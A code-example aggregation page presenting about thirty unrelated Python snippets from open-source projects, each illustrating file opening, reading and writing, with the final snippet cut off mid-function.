コード例 #1
0
ファイル: upgrade_master.py プロジェクト: Geeglee/buildbot
def installFile(config, target, source, overwrite=False):
    with open(source, "rt") as f:
        new_contents = f.read()
    if os.path.exists(target):
        with open(target, "rt") as f:
            old_contents = f.read()
        if old_contents != new_contents:
            if overwrite:
                if not config['quiet']:
                    print("%s has old/modified contents" % target)
                    print(" overwriting it with new contents")
                with open(target, "wt") as f:
                    f.write(new_contents)
            else:
                if not config['quiet']:
                    print("%s has old/modified contents" % target)
                    print(" writing new contents to %s.new" % target)
                with open(target + ".new", "wt") as f:
                    f.write(new_contents)
        # otherwise, it's up to date
    else:
        if not config['quiet']:
            print("creating %s" % target)
        with open(target, "wt") as f:
            f.write(new_contents)
コード例 #2
0
def fastq_filter(in_file, pos_file, neg_file, wanted):
    """FASTQ filter."""
    from Bio.SeqIO.QualityIO import FastqGeneralIterator
    handle = open(in_file, "r")
    if pos_file is not None and neg_file is not None:
        print "Generating two FASTQ files"
        positive_handle = open(pos_file, "w")
        negative_handle = open(neg_file, "w")
        print in_file
        for title, seq, qual in FastqGeneralIterator(handle):
            print("%s --> %s" % (title, clean_name(title.split(None, 1)[0])))
            if clean_name(title.split(None, 1)[0]) in wanted:
                positive_handle.write("@%s\n%s\n+\n%s\n" % (title, seq, qual))
            else:
                negative_handle.write("@%s\n%s\n+\n%s\n" % (title, seq, qual))
        positive_handle.close()
        negative_handle.close()
    elif pos_file is not None:
        print "Generating matching FASTQ file"
        positive_handle = open(pos_file, "w")
        for title, seq, qual in FastqGeneralIterator(handle):
            if clean_name(title.split(None, 1)[0]) in wanted:
                positive_handle.write("@%s\n%s\n+\n%s\n" % (title, seq, qual))
        positive_handle.close()
    elif neg_file is not None:
        print "Generating non-matching FASTQ file"
        negative_handle = open(neg_file, "w")
        for title, seq, qual in FastqGeneralIterator(handle):
            if clean_name(title.split(None, 1)[0]) not in wanted:
                negative_handle.write("@%s\n%s\n+\n%s\n" % (title, seq, qual))
        negative_handle.close()
    handle.close()
コード例 #3
0
ファイル: recent_ra.py プロジェクト: oldhill/recent-ra
def main():

  # Get historical data from disc
  history_file = open('rarecs_log.txt', 'r')
  full_history_log = history_file.read()
  latest_historical_set = full_history_log.split('\n')[0] #first line
  history_file.close()

  # Grab latest data from residentadvisor.net/reviews.aspx?format=recommend
  current_artist = rarecommends.recommendedArtist()
  current_work = rarecommends.recommendedWork()
  current_set = current_artist+' -- '+current_work
  
  # Debug 
  print 'latest:  '+latest_historical_set
  print 'current: '+current_set

  # If there's a new set, write new history file
  if current_set != latest_historical_set:

    new_log = current_set+'\n'+full_history_log
    updated_history_file = open('rarecs_log.txt', 'w')
    updated_history_file.write(new_log)
    updated_history_file.close()
    print 'file updated!'

  else:

    print 'no updates'
コード例 #4
0
    def sync(self, args):
        """ Synchronize rtc/repository.yaml file and each rtc repository version hash. """
        options, argv = self.parse_args(args[:], self._print_alternative_rtcs)
        verbose = options.verbose_flag
        sys.stdout.write('# Writing repository.yaml for package distribution\n')

        sys.stdout.write('## Parsing RTC directory\n')
        package = admin.package.get_package_from_path(os.getcwd())
        repos = []
        for rtc in admin.rtc.get_rtcs_from_package(package, verbose=verbose):
            sys.stdout.write('### RTC %s\n' % rtc.rtcprofile.basicInfo.name)
            repo = admin.repository.get_repository_from_path(rtc.path, description=rtc.rtcprofile.basicInfo.description)

            repos.append(repo)

        repo_file = os.path.join(package.get_rtcpath(), 'repository.yaml')

        bak_file = repo_file + wasanbon.timestampstr()
        if os.path.isfile(bak_file):
            os.remove(bak_file)
        import shutil, yaml
        shutil.copy(repo_file, bak_file)
        dic = yaml.load(open(bak_file, 'r'))
        if not dic:
            dic = {}
        for repo in repos:
            if getattr(repo, 'url') != None:
                url = repo.url.strip()
            else:
                url = ''
            dic[repo.name] = {'repo_name' : repo.name, 'git': url, 'description':repo.description, 'hash':repo.hash}

        yaml.dump(dic, open(repo_file, 'w'), encoding='utf8', allow_unicode=True, default_flow_style=False)
        pass
コード例 #5
0
def main():
    ptt_dir = '/tmp2/GorsachiusMelanolophus/ptt_posts_new/no_sponsored/'
    imgs_dir = '/tmp2/GorsachiusMelanolophus/ptt_imgs/no_sponsored/'
    start = int(sys.argv[1])
    end = int(sys.argv[2])
    fp = open('../img_num/' + str(start)+ '.txt', 'a')
    for i in range(start, end):
        try:
            post_path = ptt_dir + str(i) + '.p'
            post = pickle.load(open(post_path, 'rb'))
            url = ptt_url + post['href']
            webpage = get_webpage(url)
            imgs, blog_url = parse_post(webpage)
            if imgs:
                print(f'{i}:{len(imgs)}', file=fp)
                save(imgs, imgs_dir + str(i))
            elif blog_url:
                webpage = get_webpage(blog_url)
                imgs = get_imgs_blog(webpage)
                if imgs:
                    print(f'{i}:{len(imgs)}', file=fp)
                    save(imgs, imgs_dir + str(i))
        except KeyboardInterrupt:
            return 0
        except Exception as e:
            print(e)
            pass
コード例 #6
0
ファイル: build.py プロジェクト: HLCodeTravel/titanium_flurry
def compile_js(manifest,config):
	js_file = os.path.join(cwd,'assets','sg.flurry.js')
	if not os.path.exists(js_file): return
	
	sdk = config['TITANIUM_SDK']
	iphone_dir = os.path.join(sdk,'iphone')
	sys.path.insert(0,iphone_dir)
	from compiler import Compiler
	
	path = os.path.basename(js_file)
	metadata = Compiler.make_function_from_file(path,js_file)
	method = metadata['method']
	eq = path.replace('.','_')
	method = '  return %s;' % method
	
	f = os.path.join(cwd,'Classes','SgFlurryModuleAssets.m')
	c = open(f).read()
	idx = c.find('return ')
	before = c[0:idx]
	after = """
}

@end
	"""
	newc = before + method + after
	
	if newc!=c:
		x = open(f,'w')
		x.write(newc)
		x.close()
コード例 #7
0
ファイル: 01-C-exp.py プロジェクト: chw333/StanfordSGTC
def exp(inF1,inF2):
    G = Gene(inF1)
    ouFile = open(inF1 + '.exp', 'w')
    ouFile.write('Gene\tMock\tMERS\n')
    D = {}
    inFile = open(inF2)
    head = inFile.readline()
    for line in inFile:
        line = line.strip()
        fields = line.split('\t')
        gene = fields[1]
        D.setdefault(gene, [])
        #mock = (float(fields[2]) + float(fields[3]))/2
        #rsv20h = (float(fields[14]) + float(fields[15]))/2
        Mock = np.median([float(fields[2]), float(fields[3]), float(fields[4])])
        MERS = np.median([float(fields[5]), float(fields[6]), float(fields[7])])
        D[gene].append([Mock,MERS])
    inFile.close()
    for g in G:
        if g in D:
            if len(D[g]) > 1:
                #print(D[g])
                pass
            ouFile.write(g + '\t' + str(D[g][0][0]) + '\t' + str(D[g][0][1]) + '\n')
    ouFile.close()
コード例 #8
0
ファイル: test_alarms.py プロジェクト: cy-lee/kiloeyes
    def setUp(self):
        self.CONF = self.useFixture(fixture_config.Config()).conf
        self.CONF.set_override('doc_type', 'fake', group='alarms')
        self.CONF.set_override('uri', 'fake_es_uri', group='es_conn')
        super(TestAlarmDispatcher, self).setUp()

        self.dispatcher_get = (
            alarms.AlarmDispatcher({}))

        self.dispatcher_get_by_id = (
            alarms.AlarmDispatcher({}))

        self.dispatcher_put = (
            alarms.AlarmDispatcher({}))

        self.dispatcher_delete = (
            alarms.AlarmDispatcher({}))

        dir_path = os.path.dirname(os.path.realpath(__file__))
        alarms_data_json = open(os.path.join(dir_path,
                                             'test_alarms_data')
                                ).read().replace('\n', '')
        self.data = json.loads(alarms_data_json)
        get_alarms_data = open(os.path.join(dir_path,
                                            'test_get_alarms_data')
                               ).read().replace('\n', '')
        self.get_alarms_data = json.loads(get_alarms_data)
コード例 #9
0
ファイル: utils.py プロジェクト: hennyere/youtube-dl
def sanitize_open(filename, open_mode):
    """Try to open the given filename, and slightly tweak it if this fails.

    Attempts to open the given filename. If this fails, it tries to change
    the filename slightly, step by step, until it's either able to open it
    or it fails and raises a final exception, like the standard open()
    function.

    It returns the tuple (stream, definitive_file_name).
    """
    try:
        if filename == u'-':
            if sys.platform == 'win32':
                import msvcrt
                msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
            return (sys.stdout.buffer if hasattr(sys.stdout, 'buffer') else sys.stdout, filename)
        stream = open(encodeFilename(filename), open_mode)
        return (stream, filename)
    except (IOError, OSError) as err:
        if err.errno in (errno.EACCES,):
            raise

        # In case of error, try to remove win32 forbidden chars
        alt_filename = os.path.join(
                        re.sub(u'[/<>:"\\|\\\\?\\*]', u'#', path_part)
                        for path_part in os.path.split(filename)
                       )
        if alt_filename == filename:
            raise
        else:
            # An exception here should be caught in the caller
            stream = open(encodeFilename(filename), open_mode)
            return (stream, alt_filename)
コード例 #10
0
def copy_json(input_path, output_path):
    with open(input_path) as input:
        with open(output_path, "w+") as output:
            json.dump(
                json.load(input),
                output,
                indent=2)
コード例 #11
0
ファイル: hermes_run_script.py プロジェクト: fototo/hermes
    def consolidate_results(self):

        dicts = []
        for file in os.listdir(self.results_directory):
            if file.startswith(self.data_name + '_results_'):
                f1 = open(self.results_directory+ file, 'r')
                my_dict = eval(f1.read())
                dicts.append(my_dict)

        run_nums = [' ']
        run_nums.extend([str(r) for r in range(0,len(dicts))])

        print 'Found ' + str(len(dicts)) + ' result sets'

        full_results_loc = self.results_directory + self.data_name + '_full_results_transpose.csv'

        with open(full_results_loc, 'wb') as ofile:
            writer = csv.writer(ofile, delimiter=',')
            writer.writerow(run_nums)
            for key in dicts[0].iterkeys():
                writer.writerow([key] + [d[key] for d in dicts])

        #this file has all the info - but to bring into pandas we want to transpose the data
        df = pd.read_csv(full_results_loc, index_col=0)
        df2 = df.transpose()
        #save off the results file
        full_results_loc2 = self.results_directory + self.data_name + '_full_results.csv'
        print 'Saving: ' + full_results_loc2
        df2.to_csv(full_results_loc2, delimiter=',')
コード例 #12
0
def native_report2(src):
	data = {}
	sum = 0
	c = ""
	for root, versions, ds in os.walk(src):
		if root != src:
			continue
		for version in sorted(versions, key = str.lower, reverse = True):
			sum = 0
			data = {}
			dd = os.path.join(root, version)
			for d_version, dirs, files in os.walk(dd):
				for d in dirs:
					p = os.path.join(d_version, d) + os.sep + "*.log"
					#p = os.path.join(root, d) + os.sep + "*"
					s = len(glob.glob(p))
					sum += s
					name = os.path.join(root, d) 
					if name.startswith(src):
						name = name[len(src):]
					if name.startswith("/"):
						name = name[1:]
					#data[name] = s
					name = d_version + os.sep + name
					data[name] = s
			c += html_report(data, sum, version) + "<br/><br/>"
			#c = "<br/><br/>" + html_report(data, sum)
	open(os.path.join(src, "index.html"), "w").write(c)
コード例 #13
0
ファイル: test_appliance.py プロジェクト: AJNOURI/gns3-gui
def test_check_config(tmpdir, registry):

    test_path = str(tmpdir / "test.json")

    with open(test_path, "w+", encoding="utf-8") as f:
        f.write("")

    with pytest.raises(ApplianceError):
        Appliance(registry, "jkhj")

    with pytest.raises(ApplianceError):
        Appliance(registry, test_path)

    with open(test_path, "w+", encoding="utf-8") as f:
        f.write("{}")

    with pytest.raises(ApplianceError):
        Appliance(registry, test_path)

    with pytest.raises(ApplianceError):
        with open(test_path, "w+", encoding="utf-8") as f:
            f.write('{"registry_version": 42}')
        Appliance(registry, test_path)

    Appliance(registry, "tests/registry/appliances/microcore-linux.json")
コード例 #14
0
	def load_text(self):
		'''
		The text of instances are not stored in the prediction result file,
		so you need to call this function to load texts from testing data.

		>>> from libshorttext.analyzer import *
		>>> insts = InstanceSet('prediction_result_path')
		>>> insts.load_text()

		This method also load the extra svm features if extra svm files
		are used when training.
		'''
		EMPTY_MESSAGE = '**None**'
		sorted_insts = sorted(self.insts, key = lambda inst: inst.idx)
		i = 0
		for idx, lines in enumerate(izip(*([open(self.filepath, 'r')] + [open(f, 'r') for f in self.extra_svm_files]))):
			line = lines[0]
			extra_svm_feats = lines[1:]
			nr_extra_svm_feats = len(extra_svm_feats)
			if idx > sorted_insts[-1].idx:
				break
			if idx == sorted_insts[i].idx:
				try:
					sorted_insts[i].text = line.split('\t',1)[1].strip()
				except:
					sorted_insts[i].text = EMPTY_MESSAGE

				sorted_insts[i].extra_svm_feats = [None] * nr_extra_svm_feats
				for j, extra_svm_feat in enumerate(extra_svm_feats):
					try:
						sorted_insts[i].extra_svm_feats[j] = dict(map(lambda t: (int(t[0]), float(t[1])), [feat.split(':') for feat in extra_svm_feat.split(None, 1)[1].split()]))
					except:
						sorted_insts[i].extra_svm_feats[j] = EMPTY_MESSAGE
				i += 1
コード例 #15
0
def main():
    PROG = os.path.basename(os.path.splitext(__file__)[0])
    description = """Scan claims files"""
    parser = OptionParser(option_class=MultipleOption,
                          usage='usage: %prog claims_file, claims_file, ...',
                          version='%s %s' % (PROG, VERSION),
                          description=description)
    if len(sys.argv) == 1:
        parser.parse_args(['--help'])

    args = parser.parse_args()
    p2k = {}
    k2p = {}
    try:
        with open('claimants.csv') as csv_file:
            for line in csv.reader(csv_file, dialect="excel"):
                p2k[line[0]] = line[1]
                k2p[line[1]] = line[0]
    except IOError:
        pass
    for filename in args[1]:
        with open(filename+'_masked.csv', 'wb') as cf:
            outfile = csv.writer(cf, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
            analyze_file(filename, outfile, p2k, k2p)
            print len(p2k), len(k2p)
    with open('claimants.csv', 'wb') as cf:
        cout = csv.writer(cf, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        for p in p2k:
            cout.writerow([p, p2k[p]])
コード例 #16
0
ファイル: pathophys_of_dz.py プロジェクト: DrLulz/AnkiFlash
def page_extract(start, end, SUBSECTION):

    PDF_IN = PdfFileReader(open(PDF_DIR, 'rb'))

#    for i in xrange(PDF_IN.numPages): # for all pages
    for i in range(int(start) - 1, int(end)):

        output = PdfFileWriter()
        output.addPage(PDF_IN.getPage(i))
        
        base, name_ext = os.path.split(PDF_DIR)
        name, ext      = os.path.splitext(name_ext)
        PDF_OUT        = '{}{}'.format(TMP_DIR, '{}-{}{}'.format(name, str(i).zfill(6), ext))
        
        with open(PDF_OUT, 'wb') as outputStream:
            output.write(outputStream)
        
        gs_pdf_to_png(PDF_OUT)
        os.remove(PDF_OUT)
    
    png_list = group(os.listdir(TMP_DIR), 2)
    for tup in png_list:
        print tup
        card_front = os.path.join(TMP_DIR, tup[0])
        card_back  = os.path.join(TMP_DIR, tup[1])
        make_cards(card_front, card_back, SUBSECTION)
コード例 #17
0
ファイル: pathophys_of_dz.py プロジェクト: DrLulz/AnkiFlash
def flash_theme(name, mm):
    abspath = os.path.abspath(__file__)
    
    path  = os.path.dirname(abspath) + '/template'
    f = path + '/front.txt'
    c = path + '/css.txt'
    b = path + '/back.txt'

    with open(f, 'r') as ft, open(c, 'r') as ct, open (b, 'r') as bt:
        ftemp = ft.read()
        css   = ct.read()
        btemp = bt.read()

    m  = mm.new(name)

    fld = mm.newField('Note ID'); mm.addField(m, fld)
    fld = mm.newField('Front');   mm.addField(m, fld)
    fld = mm.newField('F Note');  mm.addField(m, fld)
    fld = mm.newField('Back');    mm.addField(m, fld)
    fld = mm.newField('B Note');  mm.addField(m, fld)
    fld = mm.newField('class');   mm.addField(m, fld)
    fld = mm.newField('Noty');    mm.addField(m, fld)
    fld = mm.newField('http');    mm.addField(m, fld)
    fld = mm.newField('video');   mm.addField(m, fld)

    m['css'] = css

    t = mm.newTemplate('Card 1')
    t['qfmt'] = ftemp
    t['afmt'] = btemp
    mm.addTemplate(m, t)
    
    mm.add(m)
    return m
コード例 #18
0
ファイル: test_examples.py プロジェクト: mitocw/latex2edx
    def test_merge(self):
        testdir = path(l2emod.__file__).parent / 'testtex'
        with make_temp_directory() as tmdir:
            fn = testdir / 'example1.tex'
            print "file %s" % fn
            nfn = '%s/%s' % (tmdir, fn.basename())
            os.system('cp %s/* %s' % (testdir, tmdir))
            os.chdir(tmdir)
            l2e = latex2edx(nfn, output_dir=tmdir)
            l2e.convert()

            fn = testdir / 'example2.tex'
            print "file %s" % fn
            nfn = '%s/%s' % (tmdir, fn.basename())
            l2e = latex2edx(nfn, output_dir=tmdir, do_merge=True)
            l2e.convert()

            cfn = path(tmdir) / 'course/2013_Fall.xml'
            self.assertTrue(os.path.exists(cfn))

            self.assertIn('<chapter url_name="Unit_1"', open(cfn).read())
            self.assertIn('<chapter url_name="Unit_2"', open(cfn).read())

            cfn = path(tmdir) / 'chapter/Unit_1.xml'
            self.assertTrue(os.path.exists(cfn))

            cfn = path(tmdir) / 'chapter/Unit_2.xml'
            self.assertTrue(os.path.exists(cfn))
コード例 #19
0
ファイル: main.py プロジェクト: XjCrazy09/RedditPasswords
def get_users():
    
    # each time ran, clean the user_list
    with open('user_list.txt', 'w'):
        pass
    
    count = 0

    # let's try and get a list of users some how.  
    r = praw.Reddit('User-Agent: user_list (by /u/XjCrazy09)')
    
    # check to see if user already exists.  Because if so they have already been scraped. 
    while count < 100:
        submissions = r.get_random_subreddit().get_top(limit=None)
        print "Running..."
        for i in submissions: 
            print i.author.name
            # run a tally
            count+=1 
            with open('user_list.txt', 'a') as output:
                output.write(i.author.name + "\n")
        print "Finished... \n"
        print "count: ", count
        time.sleep(5)
        
    usersList()
コード例 #20
0
ファイル: combine_data.py プロジェクト: MuyMal/Hettich_lab
def createMatrix(j_range = 0 ,entry = "data"):
	# j_range = 0
	# if entry == "assigned":
	# 	j_range = 1290442
	# else:
	# 	j_range = 5425990
	if j_range == 0:
		print "You need to pass in the number of clusters as an argument to this function."
		sys.exit(1)
	with open(entry+"_collective.txt","r") as fin, open(entry+"_clust_mem_matrix.txt","w") as out_1, open(entry+"_pre_intensity_matrix.txt","w") as out_2:
		clust_matrix = [[0 for i in range(0,42)] for j in range(0,j_range)]
		int_matrix = [[0.0 for i in range(0,42)] for j in range(0,j_range)]
		fin.readline()
		for line in fin:
			line = line.split()
			clust = int(line[12].split(".")[1])
			f_index = int(line[0])/11	
			clust_matrix[clust][f_index] = clust_matrix[clust][f_index] + 1
			int_matrix[clust][f_index] = int_matrix[clust][f_index] + float(line[10])
		for i in xrange(0,42):			
			out_1.write("".join(["\t",str(i)]))
			out_2.write("".join(["\t",str(i)]))
		out_1.write("\n")
		out_2.write("\n")
		for i in xrange(0,j_range):
			for j in xrange(0,42):
				if j == 0:
					out_1.write("".join([entry,"_0_0.",str(i)]))
					out_2.write("".join([entry,"_0_0.",str(i)]))
				out_1.write("".join(["\t",str(clust_matrix[i][j])]))
				out_2.write("".join(["\t",str(int_matrix[i][j])]))
			out_1.write("\n")
			out_2.write("\n")
	return None
コード例 #21
0
ファイル: address_book.py プロジェクト: Mindful/console-tools
def contacts_menu(self, args):
    address = os.path.join(self.homeRoute, 'address_book.tool')
    if not os.path.exists(address):
        address_book_init(address)
    
    cFile = open(address,'r+')
    contactsList = cFile.read().split('\n')
    cFile.close()
    
    for item in contactsList:
        if item is not "":
            item = item.split(" : ")
            contacts.add(item[0], item[2], item[3], item[1])
    
    quit = False
    commands = {'view': contacts_view, 'add': contacts_add, 'help': help, 'search': contacts_find, 'remove': remove}
    while not quit:
        command = input('(Contacts): ').strip().lower()
        if command == 'exit':
            quit = True
        elif command in commands:
            commands[command](address)
        else:
            print('Error: command "' + command + '" not found.')
    
    cFile = open(address,'w')
    for item in contacts:
        cFile.write(str(item) + '\n')
    cFile.close()
コード例 #22
0
ファイル: multiprocess.py プロジェクト: ikuradon/tdulogin
	def _child_main_loop(self, queue):
		while True:
			url = "http://geekhost.net/OK"
			f = urllib.urlopen(url)
			data = f.read()
			#print data
			abcPattern = re.compile(r'OK')
			if abcPattern.match(data):
				queue.put('Already logined')
			else:
				queue.put('Need login')
				LOGIN_URL = 'https://auth-wlc.ntwk.dendai.ac.jp/login.html'
				#LOGIN_URL = 'http://geekhost.net/checkparams.php'
				pd = yaml.load(open('config.yaml').read().decode('utf-8'))
				pd['buttonClicked'] = '4'
				pd['redirect_url'] = 'http://google.com/'
				pd["err_flag"] = "0" 
				pd["err_msg"] = ""
				pd["info_flag"] = "0"
				pd["info_msg"] = ""
				params = urllib.urlencode(pd)
				print repr(params)
				up = urllib.urlopen(LOGIN_URL, params)
			# あとは寝てる
			time.sleep(yaml.load(open('config.yaml').read().decode('utf-8'))['threadtime'])
コード例 #23
0
ファイル: gnuplot_data.py プロジェクト: BioXiao/cgat
def PlotFit( g, data, cols=(0,1) ):

    fh1, fn1 = tempfile.mkstemp()
    a,b = cols
    os.close(fh1)
    outfile = open(fn1, "w")
    for d in data: outfile.write("%f\t%f\n" % (d[a], d[b]))
    outfile.close()
    
    parameters = {}
    fh2, fn2 = tempfile.mkstemp()
    fh3, fn3 = tempfile.mkstemp()    
    os.close(fh2)
    os.close(fh3)
    open(fn2, 'w').write('m=0\nb=0\n')
    g("f%i(x) = m * x + y0" % b) 
    g("fit f%i(x) '%s' using 1:2 via y0, m" % (b, fn1))
    g("replot f%i(x)" % (b))
    
##     g('fit m*x+b "%s" via "%s"' % (fn1, fn2) )    
##     g('update "%s" "%s"' % (fn2, fn3))
##     execfile( fn3, globals(), parameters )
##     g.replot( Gnuplot.Func( "%f*x + %f" % (parameters['m'], parameters['b']) ) )
        
    return [fn1, fn2, fn3]
コード例 #24
0
ファイル: hotkeys.py プロジェクト: paucoma/samsung-tools
	def __remove_hotkey(self, command):
		""" Remove the hotkey for 'command' (and 'command' too, of course). """
		""" Return 'True' on success, 'False' otherwise. """
		self.__touch_config_file()
		oldfile = open(XBINDKEYS_CONFIG_FILE, "r")
		newfile = open(XBINDKEYS_CONFIG_FILE + ".new", "w")
		commandfound = False
		skipnextline = False
		for line in oldfile:
			if skipnextline != True:
				if line != '"' + command + '"\n':
					newfile.write(line)
				else:
					commandfound = True
					skipnextline = True
			else:
				skipnextline = False
		oldfile.close()
		newfile.close()
		if commandfound == True:
			try:
				os.remove(XBINDKEYS_CONFIG_FILE)
			except:
				sessionlog.write("ERROR: 'Hotkeys.__remove_hotkey()' - Cannot replace '" + XBINDKEYS_CONFIG_FILE + "'.")
				os.remove(XBINDKEYS_CONFIG_FILE + ".new")
				return False
			shutil.move(XBINDKEYS_CONFIG_FILE + ".new", XBINDKEYS_CONFIG_FILE)
		else:
			os.remove(XBINDKEYS_CONFIG_FILE + ".new")
		return True
コード例 #25
0
ファイル: decompiler.py プロジェクト: shomagan/cmd_py
def main():
  fb_name = open('fb_name.txt','r')
  fb_namber_to_name = fb_name.readlines()
  fb32 = open ('TESTING.fb32','rb')
  fb32_b = fb32.read()
  fb32.close
  size_conf =(ord(fb32_b[0])<<8)|(ord(fb32_b[1]))
  size_im_conf = (ord(fb32_b[2])<<8)|(ord(fb32_b[3]))
  im_conf = fb32_b[4:4+size_im_conf]
  size_fb_conf = (ord(fb32_b[4+size_im_conf])<<8)|(ord(fb32_b[5+size_im_conf]))  
  fb_conf = fb32_b[6 + 1+ size_im_conf:6 + 1 + size_im_conf + size_fb_conf]
  im_conf_c = str_to_c(im_conf,len(im_conf))
  fb_conf_c = str_to_c(fb_conf,len(fb_conf))
  print('configuration size',size_conf)
  print('immanager size',size_im_conf)
  print('fb size',size_fb_conf)
  print(im_conf_c)
  print(fb_conf_c)
  variable = {}
  fb_runtime = {}
  fb_immanager = {}
  im_one = FB()                
#  im_one.input_variable['null'] = 0
  im_one.new_var('ones',0x12,0)
  im_one.new_var('twels',0x2,2)
  im_two = FB()
  im_two.new_var('ones',0x66,0)
  im_two.new_var('twels',0x24,2)
  print(im_two.input_variable,im_two.var_variable,im_two.out_variable) 
  print(im_one.input_variable,im_one.var_variable,im_one.out_variable) 
def main():
    api_url, username, password = get_account_data(True)
    backup_files = get_nsbackup_files(True)
    if 'pickle_backup_file' in backup_files.keys():
        from pickle import Pickler
    if 'json_backup_file' in backup_files.keys():
        import json
    # Instantiate the inwx class (does not connect yet but dispatches calls to domrobot objects with the correct API URL
    inwx_conn = domrobot(api_url, username, password, 'en', False)
    # get the list of all domains:
    domains = inwx_conn.nameserver.list()['domains']
    # get all the nameserver entries for each domain
    current, total = 0, len(domains)
    nsentries = dict()
    for domain in domains:
        current += 1
        domain = domain['domain']
        print "%i of %i - Currently backing up %s." % (current, total, domain)
        nsentries[domain] = inwx_conn.nameserver.info({'domain': domain})['record']
    if 'pickle_backup_file' in backup_files.keys():
        Pickler(open(backup_files['pickle_backup_file'],'wb')).dump(nsentries)
        print "Wrote backup file using Python Module Pickle : %s." % backup_files['pickle_backup_file']
    if 'json_backup_file' in backup_files.keys():
        json.dump(nsentries, open(backup_files['json_backup_file'], 'w'))
        print "Wrote backup file using Python Module JSON: %s." % backup_files['json_backup_file']
コード例 #27
0
ファイル: hotkeys.py プロジェクト: paucoma/samsung-tools
	def __update_hotkey(self, command, hotkey):
		""" Update the hotkey for 'command' to 'hotkey'. """
		""" If 'command' is not found, add it with the new 'hotkey'. """
		""" Return 'True' on success, 'False' otherwise. """
		self.__touch_config_file()
		oldfile = open(XBINDKEYS_CONFIG_FILE, "r")
		newfile = open(XBINDKEYS_CONFIG_FILE + ".new", "w")
		# Search for command
		commandfound = False
		skipnextline = False
		for line in oldfile:
			if skipnextline == False:
				newfile.write(line)
			else:
				skipnextline = False
			if line == '"' + command + '"\n':
				newfile.write("  " + hotkey + "\n") # update hotkey
				commandfound = True
				skipnextline = True
		if commandfound == False:
			# command not found, add it
			newfile.write('"' + command + '"\n')
			newfile.write("  " + hotkey + "\n")
		oldfile.close()
		newfile.close()
		try:
			os.remove(XBINDKEYS_CONFIG_FILE)
		except:
			sessionlog.write("ERROR: 'Hotkeys.__update_hotkey()' - Cannot replace '" + XBINDKEYS_CONFIG_FILE + "'.")
			os.remove(XBINDKEYS_CONFIG_FILE + ".new")
			return False
		shutil.move(XBINDKEYS_CONFIG_FILE + ".new", XBINDKEYS_CONFIG_FILE)
		return True
コード例 #28
0
def run_example_spark_job(work_dir, timeout=25):
    """Runs a Spark job and checks the result."""
    print 'Starting Spark job'
    stdout = open(os.path.join(work_dir, 's_stdout.txt'), 'w')
    stderr = open(os.path.join(work_dir, 's_stderr.txt'), 'w')
    register_exit(lambda: stdout.close())
    register_exit(lambda: stderr.close())

    spark = subprocess.Popen([
        os.path.join(spark_path(), 'bin/spark-submit'),
        '--master', 'mesos://%s' % MESOS_MASTER_CIDR,
        os.path.join(spark_path(), 'examples/src/main/python/pi.py'), '5'],
        stdin=None,
        stdout=stdout,
        stderr=stderr)
    register_exit(lambda: spark.kill() if spark.poll() is None else '')

    while timeout:
        if spark.poll() is not None:
            break

        time.sleep(1)
        timeout -= 1

    if timeout <= 0:
        return False

    with open(os.path.join(work_dir, 's_stdout.txt'), 'r') as f:
        result = f.read()
        return 'Pi is roughly 3' in result
コード例 #29
0
ファイル: html.py プロジェクト: 89sos98/main
    def handle_finish(self):
        self.info(bold('dumping search index... '), nonl=True)
        self.indexer.prune(self.env.all_docs)
        searchindexfn = path.join(self.outdir, self.searchindex_filename)
        # first write to a temporary file, so that if dumping fails,
        # the existing index won't be overwritten
        f = open(searchindexfn + '.tmp', 'wb')
        try:
            self.indexer.dump(f, self.indexer_format)
        finally:
            f.close()
        movefile(searchindexfn + '.tmp', searchindexfn)
        self.info('done')

        self.info(bold('dumping object inventory... '), nonl=True)
        f = open(path.join(self.outdir, INVENTORY_FILENAME), 'w')
        try:
            f.write('# Sphinx inventory version 1\n')
            f.write('# Project: %s\n' % self.config.project.encode('utf-8'))
            f.write('# Version: %s\n' % self.config.version)
            for modname, info in self.env.modules.iteritems():
                f.write('%s mod %s\n' % (modname, self.get_target_uri(info[0])))
            for refname, (docname, desctype) in self.env.descrefs.iteritems():
                f.write('%s %s %s\n' % (refname, desctype,
                                        self.get_target_uri(docname)))
        finally:
            f.close()
        self.info('done')
コード例 #30
0
def main():

    options = get_options()
    with open(options.input) if options.input else sys.stdin as in_f, \
            open(options.output, 'w') if options.output else sys.stdout as out_f:

        serializer_cls = get_serializer(options.format)
        if not serializer_cls:
            sys.stderr.write('Unsupported format', options.format)
            return

        if options.human:
            serializer_cls.write_header(out_f)

        for line in in_f:
            name = line.strip()
            if not name:
                continue
            resolved = None
            try:
                resolved = resolve(name, options.single)
            except Exception as e:
                pass
            if options.parent:
                resolved = get_parents(resolved)
            out_f.write(serializer_cls.serialize_line(resolved, human=options.human, name=name))
コード例 #31
0
        #start fitting when the number of cases >= start
        # startNCases=100
        #how many days is the prediction
        # predict_range=150
        #weigth for fitting data
        wcases = 0.1
        wrec = 0.1
        #weightDeaths = 1 - weigthCases - weigthRecov

    optimal.append(opt.remote(country, e0, a0, r0, d0, date, version))
    version += 1

optimal = ray.get(optimal)

for i in range(0, len(countries)):
    with io.open('./results/resultOpt' + countries[i] + str(version) + '.txt',
                 'w',
                 encoding='utf8') as f:
        f.write("country = {}\n".format(countries[i]))
        f.write("S0 = {}\n".format(optimal[i][0][0]))
        f.write("Delta Date Days = {}\n".format(optimal[i][0][1]))
        f.write("I0 = {}\n".format(optimal[i][0][2]))
        f.write("wCases = {}\n".format(optimal[i][0][3]))
        f.write("wRec = {}\n".format(optimal[i][0][4]))
        f.write("Function Minimum = {}\n".format(optimal[i][1]))

    stdoutOrigin = sys.stdout
    sys.stdout = open('./results/log' + countries[i] + str(i) + '.txt', "w")
    print(optimal[i])
    sys.stdout.close()
    sys.stdout = stdoutOrigin
コード例 #32
0
ファイル: hidinput.py プロジェクト: ach5910/KivyApp
        def _thread_run(self, **kwargs):
            input_fn = kwargs.get('input_fn')
            queue = self.queue
            dispatch_queue = self.dispatch_queue
            device = kwargs.get('device')
            drs = kwargs.get('default_ranges').get
            touches = {}
            touches_sent = []
            point = {}
            l_points = []

            # prepare some vars to get limit of some component
            range_min_position_x = 0
            range_max_position_x = 2048
            range_min_position_y = 0
            range_max_position_y = 2048
            range_min_pressure = 0
            range_max_pressure = 255
            range_min_abs_x = 0
            range_max_abs_x = 255
            range_min_abs_y = 0
            range_max_abs_y = 255
            range_min_abs_pressure = 0
            range_max_abs_pressure = 255
            invert_x = int(bool(drs('invert_x', 0)))
            invert_y = int(bool(drs('invert_y', 1)))
